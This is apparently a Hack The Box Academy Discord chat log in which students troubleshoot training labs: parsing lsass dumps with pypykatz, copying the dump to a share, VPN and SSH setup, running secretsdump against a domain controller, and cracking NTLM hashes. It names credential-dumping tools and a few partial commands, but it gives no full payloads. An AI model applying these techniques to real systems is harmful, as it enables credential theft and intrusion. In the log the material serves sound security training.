#modules

┌─[us-academy-1]─[10.10.15.121]─[htb-ac-605555@htb-yp3zhmltaw]─[~/pypykatz]
└──╼ [★]$ pypykatz lsa minidump /home/htb-ac-605555/Documents/lsass.dmp 
INFO:pypykatz:Parsing file /home/htb-ac-605555/Documents/lsass.dmp
ERROR:pypykatz:Minidump parsing error!
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 139, in parse_minidump_file
    minidump = MinidumpFile.parse(filename)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/minidump-0.0.24-py3.11.egg/minidump/minidumpfile.py", line 52, in parse
    mf.file_handle = open(filename, 'rb')
                     ^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/htb-ac-605555/Documents/lsass.dmp'
ERROR:pypykatz:Error while parsing file /home/htb-ac-605555/Documents/lsass.dmp
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/lsadecryptor/cmdhelper.py", line 266, in run
    mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 144, in parse_minidump_file
    raise e
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 139, in parse_minidump_file
    minidump = MinidumpFile.parse(filename)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/minidump-0.0.24-py3.11.egg/minidump/minidumpfile.py", line 52, in parse
    mf.file_handle = open(filename, 'rb')
                     ^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/htb-ac-605555/Documents/lsass.dmp'
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/lsadecryptor/cmdhelper.py", line 266, in run
    mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 144, in parse_minidump_file
    raise e
  File "/usr/local/lib/python3.11/dist-packages/pypykatz-0.6.10-py3.11.egg/pypykatz/pypykatz.py", line 139, in parse_minidump_file
    minidump = MinidumpFile.parse(filename)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/minidump-0.0.24-py3.11.egg/minidump/minidumpfile.py", line 52, in parse
    mf.file_handle = open(filename, 'rb')
                     ^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/htb-ac-605555/Documents/lsass.dmp'

it won't work still

it looks like its working to me

its in documents?

try using it against the actual dump file

if you read the last line it's pretty clear what's going on

why not set up your own vm just setting up kali

there is no need for that

but it won't tell me how to transfer it from windows to linux

is that something I do from previous section?

because I remember a section like that

you didnt transfer it?

do you have notes on how to transfer?

I'm on my PC running windows talking to you on the Discord app... and I got my Kali Linux installed on the SSD on my old laptop.. another user in here said I could run my own PwnBox on Kali Linux....

it doesn't say how in this section. I do have notes on it but it doesn't say that in this specific section

file transfers module comes wayyyyy before this module, are you just doing the individual module?

VMware is a huge headache to get to run properly in itself. Why can't I just use real Kali Linux instead of virtual?

https://academy.hackthebox.com/module/details/24

they expect you to know how to do file transfers by now

you can but why do u need it to look like pwnbox?

hey guys, I'm completely stuck on the web enumeration module, could anyone tell me what's going on here?https://gyazo.com/d42997746fac783afda6c0be3f35f7d6

why does it say there isn't a wordlist?

because the file doesn't exist in that directory

try doing ls -la /usr/share/dirb/wordlists to see what's in there

no such file or directory

then that directory doesn't exist

try locate -i common.txt

locate common.txt

there's some in seclists and wfuzz/wordlist, i guess i'll try those?

the seclists one should be it

ok thanks i'll try that

I have no idea. Someone suggested that. Are you saying I can still connect to the htb-student target machine from Kali Linux? I typed ssh htb-student@[IP Address] and it just freezes

i don't get it though, i've looked at a couple tutorials and they all start with that original command i sent /dirb/worlists/common.txt

anyway i'll try it now

are you connected to the vpn?

pwnbox has been updated since then

thats the usual spot on kali tho

no. and it just returned an error message: ssh: connect to host [IP Address] port 22: Connection timed out

you need to be connected first

ok, the seclists one got it, thanks guys

oh right ok, thank you

i have done everything from a kali vm and a vpn, no extra stuff

ways to run cmd commands as a different user on dc via evil-winrm session

can i just ask quickly, what's the -i flag in this?

case insensitive

All of these things don't work for transferring file to Linux from Windows even with Python server running

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\CompData
move : Access to the path is denied.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\CompData
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], Unauthorized
   AccessException
    + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\home\htb-student\Documents
move : Could not find a part of the path.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\home\htb-student\Documents
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], DirectoryNotFoundE
   xception
    + FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\htb-student\Documents
move : Could not find a part of the path.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\htb-student\Documents
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], DirectoryNotFoundE
   xception
    + FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\
move : The UNC path should be of the form \\server\share.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], ArgumentExcep
   tion
    + FullyQualifiedErrorId : MoveFileInfoItemArgumentError,Microsoft.PowerShell.Commands.MoveItemCommand

PS C:\Users\htb-student\AppData\Local\Temp> move lsass.DMP \\10.10.15.121\Documents
move : Could not find a part of the path.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\Documents
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (C:\Users\htb-st...\Temp\lsass.DMP:FileInfo) [Move-Item], DirectoryNotFoundE
   xception
    + FullyQualifiedErrorId : MoveFileInfoItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand

Ok how do I connect?

can someone point me in the right direction?

oh sweet good to know, alright thanks again guys

I don't think I'm using a VPN

https://academy.hackthebox.com/vpn

what i like to do is creating a share and mounting it in linux. or use updog, if u have rdp access

I have rdp access but I'm unsure that mounting it is the point of the lesson

or even part of the point

you need to read the error messages. this is going to be an important skill for you. do you see the error message in your paste?

im stuck on this:
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
I ran:
ss -tuln4 | grep -v '127.0.0.1' | grep 'LISTEN' | wc -l
it gave me the answer: 8
answer is incorrect

ya directory not found

hold on a sec I will play with it but I tried switching directories

there are more errors too

Why do I have to connect to a VPN? Why can't I just connect to the HTB Pwnbox directly from my stand alone Kali Linux OS on my laptop?

or why can't I spawn a Target system box on HTB and connect it to with Kali Linux?

you can but vpn connection is needed

I am coming closer but it says I don't have permission to access the share on Windows

is there a way to copy text from my local machine and paste in the pwnbox?

PS C:\Users\htb-student\AppData\Local\temp> move lsass.DMP \\10.10.15.121\CompData
move : Access to the path is denied.
At line:1 char:1
+ move lsass.DMP \\10.10.15.121\CompData
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\htb-st...\temp\lsass.DMP:FileInfo) [Move-Item], Unauthorized
   AccessException
    + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand

I even made the folder

and what does the error say

it says access to the path is denied

Permission denied unauthorized

right, there you go

so what do I need to change the file type?

you don't have permission to write to the folder

so how do I get permission? it doesn't say how in the module

is that the name of the impacket smb share?

CompData

So I can use my stand alone Kali Linux OS on my laptop as my attack environment and connect to the HTB Target machine by running a VPN? OK went to that URL and it says to type in the terminal openvpn academy-regular.ovpn and then I got the error message Options error: In [CMD-LINE]:1: Error opening configuration file: academy-regular.ovpn

wait I might have fixed it

this isn't the place for that

I think it works hold on a sec

it says I authenticated successfully

did you download it?

I think I can go to next step

run with sudo if you did download it @mental tapir

I am such a noob and forget even the most basic Linux commands to change the directory. Do I need to cd to the Downloads folder to run it?

@coral crest i dont think medusa is on the pwnbox

no just list the path

I must be tripping, why the module explain using the tool if the tool is not in the pwnbox? (also it is in the parrot or kali)

@safe star -- is the username to the left of the @ symbol? the path should be ~/home/kali/Downloads but it isn't working... ugh

ok section completed

what command are you running?

you can install it on the pwnbox

I guess I'm just too noob and I don't understand how to change paths properly. I'm now in /Downloads folder...

and I just ran the ovpn file

i doenst matter what folder you're in as long as you put the correct path to it

yep, I am just trying to figure out which box is more complete (kali, parrot or definitely only use pwnbox)

i only used kali and it has most things already installed

you would have to keep downloading stuff everytime you use the pwnbox

it is still booting... does it take a long time to run the VPN?

did you have this same problem? (I tested with untest version of kali, and the vbox version)

yeah that happens sometimes with smbmap, but i also use crackmapexec and smbclient

i use cme to list what privileges the shares have and smbclient to connect

@safe starafter 5 minutes running academy-regular.ovpn it is still loading/thinking doing something.. I dont' know...

send a screenshot of the command

or codeblock

sudo openvpn academy-regular.ovpn

its not supposed to disappear, just close it and it will run in the background

use "ip a" to verify the tun0 interface

I hope to be my last questions, do you guys recommend always use virtual machines? in the exam (cpts) you can use your own host, or they will provide a vmachine ?
since I have been wasting more time to troubleshoot stuff (tools, scans, whatever), I want to stick to something and keep it til the exam

i havent taken it, but if your pwnbox ends up closing during the test you will lose all data on it

what should it say under the tun0?

The Python Library Hijacking Module mentions, "We can execute this script with the privileges of another user, in our case, as root," referring to the file mem_status.py with the permissions -rwsrwxr-x 1 root mrb3n. However, isn't this incorrect? Unless we have sudo rights for the Python interpreter, the script will execute under the current user's privileges, not the SUID user.

Is there a method to run a .py with the SUID user without needing sudo rights for the Python interpreter? If not, doesn't this render the entire SUID bit ineffective because we can run the interpreter as sudo anyways?

I tested this scenario and found that having sudo rights configured as (ALL) NOPASSWD: /usr/bin/python3 /home/htb-student/mem_status.py allowed it to work with or without the SUID bit for the script to achieve root access. Maybe I'm just having a moment of confusion.

an ip like 10.10.x.x @mental tapir

so it's running and I can proceed...

You can use your own VM.

yes

all done

guys i havent started learning cyber yet but i am very interested, how do i go about to see if i should get a degree into this field because who knows, i may not like it afterall

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

probably if you "chmod +x" the file

in that case you can only read it and use sudo tho

turn the file into an excutable by adding the execution right
chmod +x mem_status.py
./mem_status.py

thanks for the reply. But I think you got me wrong, the file is already executable (otherwise it would be capital S). The question is if its possible to run a .py with SUID Bit set, as the SUID Owner, WITHOUT sudoers set up for python3. You know what I mean? But after some googleing I think its not possible

ok now my terminal freezes everytime I ssh to the target box IP... is my laptop too crappy old and slow or what?

on my Kali Linux graphic at the top it shows the CPU usage and it is peaking at max CPU 100% usage for some reason... why is it doing that?

you can use the command top to see what processes are using cpu.

it says the Xorg command and splunkd and python3.9 are all running in the background... a few days ago I tried to set up my own Splunk and failed.. but it's showing I never stopped it running I think.. what is the command to get all them shut down?

should I just restart the laptop?

I think I made Splunk auto run at startup so that's not going to fix it...

try sudo systemctl stop splunkd.service (idk the service name)

i ended up just rebooting the laptop and the CPU isn't maxing out anymore nor is the Splunk running anymore... but the stupid Terminal keeps lagging big time after ssh to the htb-student target IP....

okayy so im doing the basics, os fundamentals.

my terminal is giving me a odd error

ssh: Could not resolve hostname htb-student: Name or service not known

i assume the error is in my syntax

but im using the format that was provided

thats just ssh lag

type ssh htb-student@[IP address]

wow! Really? How will I ever get any work done with this kind of lag? Is there a way to reduce the lag?

yeah it was syntax

i was putting a space between the username and at symbol

thx

by getting used to it

I'm on this step and I got error message: htb-student is not in the sudoers file. This incident will be reported.

What did I do wrong this time?

do you guys recomend me to going to college for cyber security? or is it a waste of time and money

waste of time and money. Lots of BS writing research papers.

@mental tapir yeah i put that into perspective, i just want my best chance at succeding in this field and i just didnt know what was best for me

I enrolled at Utica University for a Masters program and it was so much tedious BS research writing. Lots of busywork. I busted ass got very high GPA but toward the 2nd half of the program I got to doing the hands on labs and they were horribly designed and very poorly managed and the professor was next to useless

its just an example to setup on your own, you are currently using ssh to even run that command

I wouldn't go the college route. You're better off just reading the CompTIA A+, Network+, and Security+ study guides yourself at your own pace and then get hands on practice setting up labs at home all for free

At the end of the day, it is down to what works best for you. Are you the kind of person that can drive yourself to learn, to improve and work towards goals like certifications, or do you prefer instructed and lead education?

IMHO, mainstream education isn't quite there with security yet, but that is just my own personal opinion, and what I've observed.

A degree can open doors, but so can certifications earned under your own steam. Both will cost money, both will have value.

@mental tapir @ocean night thank you very much for the info

helps a lot

The degree programs at all universities are insanely overpriced. The cert exams are a fraction of the cost. Don't enroll in a college degree program believing that the professors will help guide your learning process. That is not the case. It's because they have too many students in their classes and they cannot give hand hold you every step of the way and if you cannot keep up with the pace of the class you get left behind costing you a few grand just for that one course. It's asinine.

I agree, but self driven learning is not for everyone. I could just say "YEAH GO BUY HTB CERTS IT'S THE BEST", but everyone learns in their own way.

There's also another aspect from University, which is the social aspect

Ok, that's not going to get you a job

But.. it's still an aspect

im more of a hands on learner and sometimes need my hand held, in which thats may be where uni may come into play but i agree its extremely over priced and i will get better value out of learning it myself

With hands on, you do always have communities to reach out to

I'd try hands on first with whichever platform you choose

See how it works out for you 🙂 It's a big decision

Exactly. Because this Discord community is way more hand holding you will ever HOPE to get from any overpaid lazy professor at a private university with small class sizes no less

At least with hands on self driven learning, you are not locked in to three years

You choose your pace

quite overlooked in the degree vs cert aspect tbh

I do see you guys have people in this discord that help eachother out and its nice to see that, im going to try and learn this on my own. other then HTB in which i will be using what other platforms are out there to help further my education other then HTB

for someone out of HS, a degree even if not beneficial in terms of education, will benefit you in life skills in general

Yeah... the few years I spent in college (and then dropped out of every year, because I was learning nothing) did help me to become more social, make some friends etc

My gripe with HTB is that the modules are also poorly written and I'm a paid member of HTB...

I was still awkward a f afterwards lol, but at least I knew there were people out there

socialising, being on your own, networking skills, friendships, and even you know:)

😦 sorry to hear you feel that way - we are always open to feedback via #1234357888114364508

i still hate uni tho

other then HTB what other websites are there that are similar to this or do you think HTB is the way to go to further my education to get certs

it is hard to answer in HTB discord server but a quick google search will help you

https://x.com/g0blinResearch/status/1831891143891832890

https://x.com/g0blinResearch/status/1831888701900910992

A couple of lists 🙂

there is letsdefend.io and tryhackme.com

i used tryhackme until i was top 9k then switched over to htb

made htb easier to understand after

g0blin are you one of the writers of the modules at HTB?

he is the writer of the writers

No, CTO / co-founder

Always open to direct feedback as well.

I don't bite 😆

OK, I'm trying to give you constructive feedback... so how come in the module for the Fundamental Linux Commands... problems that users may run into are not documented and pre-anticipated?

For instance, what does this error mean? htb-student is not in the sudoers file. This incident will be reported

i guys, idk if im allowed to uh ask this here but i was wondering if there's anyway I can hack back into my stolen google accounts?

no only google can help you with that

well if hackers from the dark web can hack into my accnts and steal them I can steal them back-

nah it's illegal though, no one here can do that for you. contact google.

not if FB1 can get you first hehe

I'm aware its illegal, I already tried contacting google none of its working

huh?

sorry, that's your only recourse. like i said no one here can help you and you're asking people to do illegal things. no one here is going to prison for you.

@mental tapir I'll certainly pass that on to the team. Could you share the command you're running in DM please?

DM you?

Yeah

hey guys i have 70 cubes and want to start my first module what do you recommend i do first. i have a lot of interest in pen testing but that doesnt matter because i need to start on a fundamental

Linux fundamentals would be a good start.

thank you @shut quest

Would the File Transfers module fall under the Post-Exploitation phase, or the Exploitation phase?

i would say post because if remember correctly the Techniques in this module supposed you already have access

That's what I was thinking, but in the Pentesting path it seems to come before any Exploitation modules so I just wanted to be 100% sure

no the path has nothing to do with it is not designed in this way each module has its on stuff if that make sense so its not that the first 1/4 will teach you pre-exploit and u will learn post-exploitation in the next module not its like mixed each module will teach some stuff about everything i hope this clarify the idea

Figured as much, Makes it more annoying for organizing my notes, but I'll work around it.

yup i know what u mean i'm studying the path also so i can relate to this issue the way i'm planning to do is writing the notes for each section of the modules and after finishing the path i will revisit the note and rearrange everything to this way u mentioned so to be faster to access because a lot of command overlapped and in this way i can refresh my memory about everything i learned

guys i'm doing the domain trust attack - linux i already compromised the parent domain but the question ask for bross hash but there's no tools on the parent machine am i supposed to a upload some tools or i'm missing something here ?

The lab is broken.
I am not getting email.
SMTP Injection using CRLF
https://academy.hackthebox.com/module/191/section/2057

Ideally it should show as Connected as shown in Github
https://github.com/mailhog/MailHog/raw/master/docs/MailHog.png

Right now I'm trying to use Hackthebox for the training. Is it okay to use kali linux over parrots os or is it better to stick to the original?

kali is fine

whatever you want its fine

I used Kali back in university while I had a CIT class. I guess I can keep using it, but right now I'm learning about web fuzzing.

First module but it is a start.

They have shown many ways to dump hashes

without tools ? which section i went back to living of the land found nothing about dumping hashes

not sure why my q was deleted ? anybody ?

I don

I don't think we can uses the instances from our browsers to use the boxes right?

How do I have an uneven number of cubes? 😂

I wanted to test their mastered distribution for 3 months that problems the best is kali or a custom Debian by you

hello, im doing Windows Privilege Escalation DnsAdmins. I m trying to stat the dns after stopping but its not starting. I have use sc.exe start and net start none of them work. Some help would be appreciated.

Use cmd

Not powershell

Just sc

Password attacks - password mutations. I downloaded the resources from the top right corner. The rules file is very extensive and when I generate the mutated wordlist, the original 203 words spits out 187775 alterations. Obviously it takes forever to bruteforce || regardless which service I attack || , is this expected or am I missing something? Before finally writing here, I have tried different tools and services. Please advice. Edit to this, took away duplicates and is down to 94000. Still a lot

Finally worked after spawning a new machine everytime it took me like 4 attempts

I had left the list like that just I had to increase the threads and attack a common service (not the ssh)

yeah, I'm not attacking ssh. Do you mean running the original, not mutated wordlist?

Our cubes are of same digits

I running muttated list with hydra with threads of 16 you can even put at 32, in general it took time after it has something that I discovered is to determine the password policy to reduce the size of the passwords in the list but you need valid login information to authenticate yourself near the domain

Did everyone's cubes decrease by one or something? 🤔

Sorry I confused you to determine the password policy it’s in the AD module

Ah, ok

Hmmm I chose ftp

yeah tried that to...

It takes time you have to be patient for this module

Hey
i need some tip on password attacks skill assestment easy
I assuming i have to brute force into SSH or FTP but after trying mamy combinationa i cant get any passwords

I did exactly what is in the course I think it took me more than 40 minutes to find the user’s password on the ftp service

i'm dying any hints ?

Hi. Im doing the first class of windows fundamentals. Im trying to connect remotly to the vm of htb-academy using freerdp in my linux terminal but it says: [10:03:26:731] [2587:2588] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Tubería rota
[10:03:26:731] [2587:2588] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[10:03:30:929] [2587:2588] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Tubería rota
[10:03:30:930] [2587:2588] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[10:03:30:930] [2587:2588] [ERROR][com.freerdp.core] - freerdp_post_connect failed

the command im using is the one which is mentioned in the academy: xfreerdp /v:<targetIp> /u:htb-student /p:Password

It was 30 minutes of waiting for me or sure to take the users and passwords provided on the ftp service

you ran openvpn ?

I’m not there yet 😭

I did it with and without vpn but it doesnt work

just do it from your own host

try chaning vpn servers

open two terminal or tabs the first one run openvpn with the vpn file and go to second windows and try to rdp with it this must work

you mean using secretsdump ? i tried to use it didn't work

why not

just given pass and users?
without changes?

Ok, now it works thanks to all

Yes, I hadn’t changed anything here

what's the error mate, just saying it doesn't work is not helpful

my bad "DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid."

is this the way is supposed to be solved ? using secretsdump

have you followed the steps and made the ticket?

htb-student_adm is only a valid user on the child domain

yes i'm already in the shell and i have exported the ccache if that what you mean

great, do that with secretsdump then

the synatx is similar to psexec

tried to use hacker user that we created and used it with no-pass flag that didn't work its says status_logon_failure

whats the command

Finally, got it! 🙂

Any Indian??

Here

use the same command as the psexec

Why wouldn’t you need tools

i don't know maybe they want me to do it in some way that u don't need tools

Take it to DM if you'd like to help.

Sounds like a module over Tier 0, and there are commands being shared here which could be considered as spoilers.

goblin those commands are very standard for secretsdump

didn't see the message so I'm guessing what it is

Ok, well I was going on the module tier.

will try again .. anybody can share any hint on cme skill assessment q3 "Gain access to the DEV01 and submit the contents of the flag located in C:\Users\Administrator\Desktop\flag.txt. " ? i have j..s ntlmv2 hash but no you with hashcat and rockyou.. tried ntlmrelayx but i only get " Received connection from INLANEFREIGHT/j***s at DC01, connection will be relayed after re-authentication".. and no ntlm hash 😐 should that work ? i'm on latest parrot so maybe something is broken here 😐

i had to upload mimikatz and just extract the hash from it i'm not sure if this is the way i'm supposed to solve the question but it worked

that works too but so does secretsdump, I have tested it

ntlmrelayx doesn't capture the hashes, it will just relay. use another tool

is it okay if i DM you the secretsdump.py command i used ?

it's excatly the same as the psexec command given in the module, just swap psexec.py with secretsdump.py

if your psexec command worked so will secretsdump

resp..r i assume ? i used that to get ntlmv2 .. or there is yet another one i should use ?

yep, if you got the hash then crack it

i did this its not working i get this and yes i used -just-dc-user "Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user"

using -just-dc user <username> i get this "Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)"

as above - not in rockyou 😐

probably gave it the wrong name then, don't use -just-dc user just dump all the users

is there any other dict i should use ?

it is

make sure you've copied the hash correctly

you mean just using -just-dc ? its not working

so you're telling me that the same command worked for psexec but not secretsdump

go try psexec again

i restarted the machine i will try everything from the start

lol 🙂 dunno how i copy it wrong - you are absolutely right 🙂 many thanks

yup works now thanks man i think because i used both the manual way and the automated one things got missy but just using the manual one that worked

need help on win privesc, can i dm anyone?

#modules message

Hi, could someone please help over DM with "HTTP Attacks Skills Assessment"? I've got the TE.CL via te.te just as the hint pointed and crafted the payload to bypass WAF, but the email is not received. I think I may be failing with proper URL encoding, but I've already tried all that came to mind.

For skill assessement 2 windows privesc i succeced enable all privilege|| SeChangeNotifyPrivilege|| and|| SeIncreaseWorkingSetPrivilege|| after that i've enabled the binary ||EnableSeLoadDriverPrivilege.exe|| but nothing The course states that the two privilege activators can be used to activate SeLoadDriverPrivilege with the .\EnableSeLoadDriverPrivilege.exe binary. if someone has a hint

Did you by chance run an automated enumeration tool that would identify potential vulnerabilities?

😭😭😭 no I directly did whoami /priv to see what the rights of htb-student are

I threw myself into a rabbit hole 😭

I recommend enumerating more.

Thx

Hi, could someone help me out with Elastic module? I need to find the common date on which all returned events took place in pre-created visualization (answer format: 20XX-0X-0X). And I think I found it, but it doesn't accept the answer

That's not wrong to run that command, but I would fully enumerate the host. Have a solid enumeration process and stick to your process.

But it’s misleading because I saw 2 privileges that were stated in the courses but it is true that the current user is not part of the administrator group or printer groups so I was wrong in my process

There will be plenty of things that can be misleading, which is where the more information you have, the easier it will be to identify a path or things to research.

Yes you’re right thx for advice 🫡

Anytime.

damn, no idea what I'm doing wrong -- all I needed to add is @timestamp row

just a sec im only a few sections ahead and ill review my work

@glad patio mind linkin me to the exact section you're on?

Hello dear friends,is going through MySQL the only viable thing to do in the Easy Lab of Attacking Common Services?

The forums suggest there are two methods but i can only see two methods to read the flag through using mysql so im confused if im missing something.People are mentioning phpmyadmin but its impossible to visit it.Gives me a forbidden error

quick question about HTTPs/TLS Attacks skill assessment, how can I get access to the mail it's talking about? didn't find any corresponding endpoint or similar. Where should I look instead?

Hello. Can anyone help me on Information Gathering - Web Edition Skills Assessment? I ve added the ip on my etc hosts however when i try to use whois im getting literally nothing. It is not just with whois, ReconSpider FinalRecon also gives me nothing. Is there anything im doing wrong?

Also i ve tried dnsenum but it gave me some errors....

These IPs and domains are not public so you can't really use whois on them.

https://academy.hackthebox.com/module/18/section/74
trying to install NFS but it says htb-student is not in the sudoers file. Why does it say that?

I recommend to reread the DNS and virtual hosts section

oooh i ve forgotten. thank u

https://academy.hackthebox.com/module/18/section/74

why do I have to be in root to install NFS? I connected to a VPN on a Kali Linux machine... Why doesn't sudo work?

So I just did this one again, since it was updated and I am pretty certain they give you a .com domain for some of the questions, i.e., whois, etc., and a vhost with .htb for other questions.

he is in the skill assessment

Yup, and I'm pretty sure the first question says to use a .com domain to identify the IANA ID, unless I am on the wrong assessment.

you are right my bad I didn't look at the first question

you can't sudo in your kali machine?

it is possible that he confused .com with .htb and that is why it didnt work

All good and the only reason I remember is I just redid that one.

I can but it's giving me an error that htb-student is not in the sudoer file

uhh kali doesn't have a htb-student user by default

just use the kali user

So, instead of ssh htb-student@[IP Address] I would do ssh [Kali user]@[IP address]?

are you doing the Network Services section?

yes

that section didn't ask you to ssh in

so do it in your own host or pwnbox

but that's just a demo, you don't have to install and enable the nfs service

Just a demo? It's part of the lesson... Why wouldn't it work?

I don't have to... but that's the whole point of getting familiar with Linux... to have a working machine to practice on...

.

.

Then why did someone tell me to connect to the HTB target through VPN?

because some section requries you to connect to the target, just not the one you're currently doing

pls do the Intro to Academy module

I have done it

then you should know that therre are different types of targets you might need to connect to

the exploit didn't work, can't say without more info. read #welcome to get verified so that you can send screenshots

just a quick question for the public exploits module because someone said yesterday pwnbox had been updated at some point which i think buggered up the lab, nmap -sV shows openssh is version 9.2, does this matter? searchsploit is returning no vulnerabilities but it does show vulnerabilities when i check 7.2 like it says in the module reading

go to the ip and port given in your browser and take a look

what am i looking for, sorry?

what do you see?

Simple Backup Plugin 2.7.10 for WordPress

is it http?

exactly, look that up

Hello, I have a question regarding the Kerberos Attacks module

How can I practice the commands and attack steps using my own Windows VM instance as an attack machine?

Tunnel or set up your own lab ?

am i along the right lines with running the auxiliary/scanner/http/wp_simple_backup_file_read exploit?

tunnel

try

Sorry that was 2 options you have, ignore the question mark

yeah i have done an it was succesful, so am i now trying to find files to read?

oh my pwnbox got disconnected

Struggling for a long time, any suggestions how that can be achieved

your goal is to get the flag

I'd recommend setting up your own lab, you can look into GOAD if you don't want to set it up from scratch yourself

I already have the Windows VM setup. Want to use that to try attacks on a target from the Kerberos Attacks module

Fails with a ""Unknown error (0x80005000)""

And also , when trying out the provided target, the given RDP password is incorrect

your own windows VM is not enough, you need a AD set up

why would it be incorrect

It is! Unable to connect to it

Connecting to the VPN of HTB --> Target of Kerberos labs --> using a Windows machine instead of Linux

are you familiar with AD? maybe you should do the tier 2 AD modules before doing a tier 3

if you want to connect through windows rdp, you'll need to specify the domain

I would even suggest Intro to AD, then the AD module of CPTS.
I added the Intro module to my path, and although a bit redundant at times, it helped me having a bit of a clearer vision of what was AD.
Because the AD module of CPTS is DENSE omg

👍

didn't occur to me to set the other options of the exploit apart from rhosts aha

finished it now anyway, thanks xre0us

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain i dont understand the que and its answer as well

can someone explain me

fqdn is the one which have hostname.secondleveldomain.TLD and when querying dig with the ip they provided of the dns server i dont get any answer but when i did ns record it gave me nameserver and its the answer to this i dont understant that why only nameserver is the only answer here

because it’s asking for the FQDN for the DNS server

which is the name server for the website inlanefreight.htb

dig -x 10.129.166.197

this will do reverse lookup on that ip

so it means that there is no ptr record

I had to google how to start up the Apache server... why does this module https://academy.hackthebox.com/module/18/section/74 just assume that you know what command to use to run the Apache server? Instead it just says "After we have started it"... Sure would be nice for the writer of this module to have explained how to do that instead of forcing us noob learners to have to google external sources. These lessons are not noob friendly. I don't mean to be a snob, but how hard would it have been to include this crucial instruction just to make the learning experience smoother and less troublesome than it has to be? service apache2 start? I'd understand if they omitted this instruction had it been explained in a prerequisite module, but there are no prerequisite modules/lessons to learn this since this is already a Fundamental module... In a Fundamental (super easy) beginner level course for noobs and already they assume we know all this? To know the correct command I had to watch this video https://youtu.be/JULMHrhCXjE

good job you've used google, that's an essential skill in cyber

Yes, that is what my brother tells me who's already landed a 140k/yr job doing this. Get used to googling everything...

your goal is to find the fqdn of the name server

yeah, the module doesn’t even ask for that lol

i just read back through that section, like, “i don’t remember having to do all that 🤨” lol

yeah its not discussed in the section

but i was thinking of doing reverse lookup on this ip to find the domain

so what would tack onto a dig query if you were looking for the NS?

i'm doing the AD skill assessment i found the user and the password and i tried to create pssession and it worked but i can't cd or dir but i can use whoami which return the username in MS01 any idea ?

